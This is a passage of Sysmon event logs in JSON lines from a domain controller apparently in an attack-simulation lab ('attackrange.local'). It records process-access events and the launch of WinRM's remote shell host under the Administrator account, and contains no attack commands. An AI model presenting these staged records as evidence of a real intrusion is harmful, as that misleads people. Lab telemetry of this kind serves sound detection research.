ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":9207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.400\r\nProcessGuid: {E2A3D6B1-13D2-5F25-0000-0010EF1A1200}\r\nProcessId: 4900\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-13D2-5F25-0000-0020B61A1200}\r\nLogonId: 0x121AB6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.400","ProcessGuid":"{E2A3D6B1-13D2-5F25-0000-0010EF1A1200}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-13D2-5F25-0000-0020B61A1200}","LogonId":"0x121ab6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001092DC1000}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001092DC1000}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001092DC1000}\r\nTargetProcessId: 4900\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001092DC1000}","TargetProcessId":"4900","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.388\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.388","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
